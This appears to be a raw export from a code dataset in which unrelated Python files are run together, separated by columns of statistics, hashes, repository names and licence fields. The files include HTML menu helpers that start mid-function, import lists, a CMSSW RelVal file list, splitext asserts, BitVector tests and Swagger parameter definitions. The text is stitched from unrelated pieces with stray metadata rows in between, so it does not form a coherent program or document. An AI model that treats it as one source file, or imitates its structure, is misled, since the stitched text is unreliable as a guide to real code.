        "<li><a href='/talent'><span class='glyphicon glyphicon-user'></span> Talent</a></li>",
        "<li role='separator' class='divider'></li>",
        "<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>",
    )
    return "".join(items)
def __get_talent_hamburger_menu_items():
    """Single source of truth for the talent hamburger-menu list items.

    Returns:
        str: html5 ``<li>`` elements for the hamburger menu.
    """
    items = (
        "<li><a href='/'><span class='glyphicon glyphicon-home'></span> Home</a></li>",
        "<li role='separator' class='divider'></li>",
        "<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>",
    )
    return "".join(items)
| 34.746269
| 106
| 0.65421
| 314
| 2,328
| 4.656051
| 0.207006
| 0.133379
| 0.147743
| 0.166211
| 0.800958
| 0.730506
| 0.709986
| 0.709986
| 0.662107
| 0.662107
| 0
| 0.003702
| 0.187715
| 2,328
| 66
| 107
| 35.272727
| 0.769434
| 0.214777
| 0
| 0.464286
| 0
| 0.321429
| 0.539683
| 0.176304
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.035714
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e263a28e26eb535ac4b6c9f200823f4b809c6b7
| 269
|
py
|
Python
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | 1
|
2021-11-07T22:22:29.000Z
|
2021-11-07T22:22:29.000Z
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | 117
|
2021-01-06T00:30:25.000Z
|
2022-03-28T23:12:11.000Z
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | null | null | null |
from pocketutils.core import OptRow, SmartEnum, frozenlist
from pocketutils.core.chars import *
from pocketutils.core.exceptions import *
from pocketutils.core.input_output import *
from pocketutils.core.iterators import *
from pocketutils.tools.all_tools import Tools
| 38.428571
| 58
| 0.840149
| 35
| 269
| 6.4
| 0.4
| 0.401786
| 0.424107
| 0.334821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096654
| 269
| 6
| 59
| 44.833333
| 0.921811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e2a1baa79f641f5e392f28047db209868e10610
| 10,489
|
py
|
Python
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 6
|
2017-09-08T14:12:56.000Z
|
2022-03-09T23:57:01.000Z
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 545
|
2017-09-19T17:10:19.000Z
|
2022-03-07T16:55:27.000Z
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 14
|
2017-10-04T09:47:21.000Z
|
2019-10-23T18:04:45.000Z
|
# from /RelValZPrime5000JJ/CMSSW_2_1_0_pre6-RelVal-1214239099-STARTUP_V1-2nd/GEN-SIM-DIGI-RAW-HLTDEBUG-RECO
import FWCore.ParameterSet.Config as cms
# from
def RecoInput() :
    """Build the PoolSource for the RelValZPrime5000JJ RelVal sample.

    Returns a ``cms.Source("PoolSource")`` pre-configured with the 80
    GEN-SIM-DIGI-RAW-HLTDEBUG-RECO ROOT files of the
    ``1214239099-STARTUP_V1-2nd`` production (see the dataset comment at the
    top of this file).
    """
    # Verbose source-level debugging is switched on for this RelVal input.
    return cms.Source("PoolSource",
        debugVerbosity = cms.untracked.uint32(200),
        debugFlag = cms.untracked.bool(True),
        # Exhaustive file list for the dataset; do not edit individual entries.
        fileNames = cms.untracked.vstring(
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/02123B00-BC42-DD11-8A59-000423D6CA02.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/022373EC-B342-DD11-8E53-001617E30F4C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/04E4364D-C242-DD11-8481-000423D6CA72.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0A69E636-C142-DD11-9B5D-000423D992DC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C050842-B542-DD11-B5D4-000423D94E70.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C156BF8-B842-DD11-A1E7-000423D9853C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C82D302-B642-DD11-8910-0019DB29C5FC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0E63D7BD-B442-DD11-9E76-001617DBD332.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/10AB3A52-B442-DD11-9A6B-001617DBD288.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1448781B-B742-DD11-883B-000423D998BA.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/145049C2-BE42-DD11-83C0-000423D9870C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1468D509-BF42-DD11-AE17-000423D6BA18.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1497D214-B542-DD11-A818-001617E30D00.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/163B3739-BD42-DD11-B5E4-001617DBCF1E.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1853C569-C142-DD11-B955-000423D6CAF2.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1ACFE920-C242-DD11-8C90-000423D6B444.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1ADE73A2-C042-DD11-9E30-001617DF785A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1E5AAFF3-B342-DD11-BC28-001617C3B6E8.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/22E86C41-B742-DD11-AAB8-000423D94A04.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/22F77CBD-C142-DD11-9761-000423D6AF24.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/269B56F8-B942-DD11-B20D-0019DB29C614.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/26CEEB02-B542-DD11-AF71-00161757BF42.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2A86C27B-BD42-DD11-ABC5-001617C3B76A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2AC44294-B442-DD11-91F0-000423D9870C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2C145D12-C042-DD11-BFFB-001617E30F58.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2C811DD2-B442-DD11-B501-001617DBD5B2.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2ECD8DD9-DA42-DD11-AD6C-000423D6CAF2.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/34F4DD17-B642-DD11-9C7F-001617E30CC8.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/3E07AFA1-C042-DD11-94B6-001617E30E2C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/423AF539-B542-DD11-AD01-000423D98E54.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/4C9EB506-B542-DD11-9DD5-000423D9853C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/50C7B709-B542-DD11-9C50-000423D992DC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/52644119-B442-DD11-B107-001617DF785A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/52BA9CAB-B642-DD11-8678-000423D99A8E.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/5A8ED482-D042-DD11-AA45-000423D6B358.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/5E6B8E52-B642-DD11-91F4-000423D99CEE.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6030B4FD-B442-DD11-B1B3-000423D6C8EE.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6821370D-B642-DD11-9465-000423D990CC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6A575E8C-BE42-DD11-A534-000423D6CAF2.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6E8B6FCE-BA42-DD11-86CB-000423D985E4.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/704C6DE2-BD42-DD11-857D-000423D9939C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/7201E196-C042-DD11-8619-000423D6BA18.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/7AF8CA3B-B542-DD11-A56A-001617DBD332.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/8030EBE3-D642-DD11-A92F-000423D9870C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/82CAEE7B-BD42-DD11-8075-001617C3B76A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/861DDE4E-C242-DD11-A7DD-000423D9863C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/88CD0478-0643-DD11-9F29-000423D9853C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/90CC5B4C-B642-DD11-BF7B-0019DB2F3F9B.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9238E2D5-BA42-DD11-8F68-000423D9939C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/92466FF6-BD42-DD11-A013-001617E30F58.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9A7E7932-B542-DD11-8DBD-001617DF785A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9C27E5CB-BE42-DD11-ABCB-000423D6B358.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9C6F2DFC-BC42-DD11-8363-000423D992DC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A27F84F9-C042-DD11-BA4E-000423DD2F34.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A287D080-B842-DD11-9B8D-001617E30D0A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A6298D5E-B442-DD11-BDD1-001617DBCF1E.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/AE42126E-BD42-DD11-B24F-001617C3B76E.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/B629193F-B542-DD11-8FA0-001617C3B710.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/BAA41619-B442-DD11-A8F1-001617E30D52.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/BAEF42C3-B542-DD11-8008-000423D98EA8.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/C49C9A04-C042-DD11-A1AD-001617E30F50.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/C66658E5-B442-DD11-A28D-000423D98950.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CA974CA5-B242-DD11-AFE0-001617C3B5D8.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CAB3A95C-B442-DD11-846A-001617C3B6CC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CE3CDA38-C042-DD11-9A73-000423D6C8E6.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/D2940B94-B442-DD11-B5F3-001617C3B706.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/D2DDA5BB-BD42-DD11-A491-001617DBD5AC.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DAC11869-C042-DD11-8F79-000423D98DB4.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DC682983-B542-DD11-8DB0-000423D95220.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DCC90E90-B242-DD11-9969-001617E30D00.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DCF131B7-C242-DD11-8A65-000423D9880C.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DE3BC247-B542-DD11-BF36-001617C3B79A.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DE4AA6E3-BC42-DD11-9F6E-001617C3B778.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/E0C7BA99-B442-DD11-8F2C-001617C3B778.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/E8D00DF6-B242-DD11-9C32-000423D992A4.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/EE7E76CB-BB42-DD11-BCC5-001617C3B6E2.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/F40F9434-B742-DD11-9344-000423D985B0.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/F6745063-BF42-DD11-8000-000423D6B444.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/FA726640-C042-DD11-9035-00161757BF42.root',
        '/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/FE6CFC98-B542-DD11-9608-000423D98BC4.root'
        )
    )
| 110.410526
| 125
| 0.825627
| 1,485
| 10,489
| 5.774411
| 0.191919
| 0.160583
| 0.179475
| 0.207813
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0
| 0.379284
| 0.017924
| 10,489
| 94
| 126
| 111.585106
| 0.45316
| 0.010487
| 0
| 0
| 0
| 0.909091
| 0.941687
| 0.940723
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011364
| true
| 0
| 0.011364
| 0.011364
| 0.034091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
eaa477c26af035ba04c8b459c1ca9c3da3753252
| 119
|
py
|
Python
|
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
# Printing: ',' vs '+'
# A comma passes separate arguments — print() inserts a space between them and
# stringifies each one itself. '+' concatenates first, so non-strings must be
# converted explicitly with str().
print('Hallo', 'Welt')
print('Hallo' + 'Welt')
print('Nummer:', 100)
print('Number:' + str(100))
| 23.8
| 27
| 0.579832
| 15
| 119
| 4.6
| 0.6
| 0.289855
| 0.405797
| 0.550725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 0.117647
| 119
| 5
| 27
| 23.8
| 0.6
| 0.168067
| 0
| 0
| 0
| 0
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
eae58a7486469d632b2527aa2c9981964a9e39b6
| 145
|
py
|
Python
|
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
from textworld.gym.utils import make_batch
from textworld.gym.utils import register_game, register_games
from textworld.gym.core import Agent
| 36.25
| 62
| 0.841379
| 22
| 145
| 5.409091
| 0.545455
| 0.327731
| 0.403361
| 0.352941
| 0.453782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 63
| 48.333333
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eaf03970fe6c7ff117336d98634a32167742bc60
| 203
|
py
|
Python
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
2021-12-22T11:25:51.000Z
|
from os.path import splitext

# Smoke tests for os.path.splitext: a leading dot marks a hidden file, not an
# extension, so it stays attached to the root.
cases = {
    "foo": ("foo", ""),
    ".foo": (".foo", ""),
    "foo.bar": ("foo", ".bar"),
    ".foo.bar": (".foo", ".bar"),
}
for path, expected in cases.items():
    assert splitext(path) == expected
| 25.375
| 47
| 0.571429
| 25
| 203
| 4.64
| 0.32
| 0.482759
| 0.586207
| 0.344828
| 0.793103
| 0.793103
| 0.491379
| 0
| 0
| 0
| 0
| 0
| 0.128079
| 203
| 7
| 48
| 29
| 0.655367
| 0
| 0
| 0
| 0
| 0
| 0.216749
| 0
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d80685ec948125f44aa911b822ff4cc076597833
| 3,172
|
py
|
Python
|
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | 2
|
2020-12-29T18:37:07.000Z
|
2021-05-11T12:48:04.000Z
|
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | null | null | null |
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import random
from pycoils.misc.bit_vector import BitVector, BV_DEFAULT_MAX_VALUE
class TestBitVectorDefaultInstance(unittest.TestCase):
    """Exercise a BitVector built with its default maximum value."""

    def setUp(self):
        # Fresh vector for every test method.
        self.bv = BitVector()

    def test_default_max(self):
        self.assertEqual(self.bv.max_value, BV_DEFAULT_MAX_VALUE)

    def test_item_size(self):
        # Backing array stores one byte per element.
        self.assertEqual(self.bv.vector.itemsize, 1)

    def test_set_negative(self):
        with self.assertRaises(ValueError):
            self.bv.set(number=-1)

    def test_set_zero(self):
        self.bv.set(number=0)
        self.assertTrue(self.bv.has(0))

    def test_set_gt_max_value(self):
        with self.assertRaises(ValueError):
            self.bv.set(number=self.bv.max_value + 1)

    def test_has_on_empty(self):
        # Nothing set yet: every query must come back False.
        for value in range(BV_DEFAULT_MAX_VALUE + 1):
            self.assertFalse(self.bv.has(value))

    def test_set_even(self):
        # Set every even value, then verify evens are present and odds absent.
        evens = [value for value in range(BV_DEFAULT_MAX_VALUE + 1) if value % 2 == 0]
        for value in evens:
            self.bv.set(number=value)
        for value in range(BV_DEFAULT_MAX_VALUE + 1):
            if value % 2 == 0:
                self.assertTrue(self.bv.has(value), '{0} has to be in bit vector'.format(value))
            else:
                self.assertFalse(self.bv.has(value), '{0} should not be in bit vector'.format(value))

    def test_set_unset(self):
        # Round-trip three random values through set/has/unset/has.
        chosen = random.sample(range(0, BV_DEFAULT_MAX_VALUE + 1), 3)
        for value in chosen:
            self.bv.set(value)
        for value in chosen:
            self.assertTrue(self.bv.has(value), '{0} has to be in bit vector'.format(value))
        for value in chosen:
            self.bv.unset(value)
        for value in chosen:
            self.assertFalse(self.bv.has(value), '{0} should not be in bit vector'.format(value))
class TestBitVectorLargeMaxValue(unittest.TestCase):
    """Exercise a BitVector sized for a one-billion maximum value."""

    def setUp(self):
        # A large vector: 1e9 + 1 addressable numbers.
        self.max_value = 1000000000
        self.bv = BitVector(max_value=self.max_value)

    def test_default_max(self):
        self.assertEqual(self.max_value, self.bv.max_value)

    def test_item_size(self):
        # Backing array should still use 1-byte items at this size.
        self.assertEqual(1, self.bv.vector.itemsize)

    def test_set_negative(self):
        self.assertRaises(ValueError, self.bv.set, number=-1)

    def test_set_zero(self):
        self.bv.set(number=0)
        self.assertTrue(self.bv.has(0))

    def test_set_gt_max_value(self):
        self.assertRaises(ValueError, self.bv.set, number=self.bv.max_value + 1)

    def test_set_unset(self):
        # Round-trip a large random sample through set -> has -> unset -> has.
        picked = random.sample(range(0, self.max_value + 1), 30000)
        for n in picked:
            self.bv.set(n)
        for n in picked:
            self.assertTrue(self.bv.has(n), '{0} has to be in bit vector'.format(n))
        for n in picked:
            self.bv.unset(n)
        for n in picked:
            self.assertFalse(self.bv.has(n), '{0} should not be in bit vector'.format(n))

    def tearDown(self):
        # Release the large backing array promptly between tests.
        del self.bv
| 30.796117
| 99
| 0.617591
| 446
| 3,172
| 4.255605
| 0.139013
| 0.091675
| 0.047418
| 0.071128
| 0.851423
| 0.841412
| 0.770285
| 0.75764
| 0.729189
| 0.729189
| 0
| 0.018671
| 0.27396
| 3,172
| 103
| 100
| 30.796117
| 0.805471
| 0.027427
| 0
| 0.7
| 0
| 0
| 0.056549
| 0
| 0
| 0
| 0
| 0
| 0.242857
| 1
| 0.242857
| false
| 0
| 0.042857
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc409d500bf2d8e97a144e1855d2d2f5fdf23705
| 2,829
|
py
|
Python
|
accounts/swagger_params.py
|
deeptipandey111/sabkadashboard
|
c5d0de173bb9027781876256f54d79ba63075e80
|
[
"MIT"
] | 1
|
2021-08-23T05:25:30.000Z
|
2021-08-23T05:25:30.000Z
|
accounts/swagger_params.py
|
MrNevil/Django-CRM
|
8cb9803748bb3e03f843c47413232185f78261f2
|
[
"MIT"
] | null | null | null |
accounts/swagger_params.py
|
MrNevil/Django-CRM
|
8cb9803748bb3e03f843c47413232185f78261f2
|
[
"MIT"
] | 1
|
2021-03-25T04:01:27.000Z
|
2021-03-25T04:01:27.000Z
|
from drf_yasg import openapi
# Reusable Swagger/OpenAPI parameter definitions for the account API views
# (consumed by drf_yasg @swagger_auto_schema decorators).


def _required_string_param(name, location=openapi.IN_QUERY):
    """Return a required string openapi.Parameter at *location* (query by default)."""
    return openapi.Parameter(name, location, required=True, type=openapi.TYPE_STRING)


# Every account endpoint expects the active company in a request header.
company_params_in_header = _required_string_param("company", openapi.IN_HEADER)

# Query fields shared by the account create and update POST endpoints.
_ACCOUNT_FIELD_NAMES = (
    "name",
    "phone",
    "email",
    "billing_address_line",
    "billing_street",
    "billing_city",
    "billing_state",
    "billing_postcode",
    "billing_country",
    "contacts",
)


def _account_post_params():
    """Build a fresh parameter list: the company header plus all account fields."""
    return [company_params_in_header] + [
        _required_string_param(field) for field in _ACCOUNT_FIELD_NAMES
    ]


account_list_get_params = [company_params_in_header]
account_list_post_params = [company_params_in_header]
account_create_get_params = [company_params_in_header]
# Create and update POST take identical parameters; build separate list
# objects so mutating one list cannot affect the other.
account_create_post_params = _account_post_params()
account_update_get_params = [company_params_in_header]
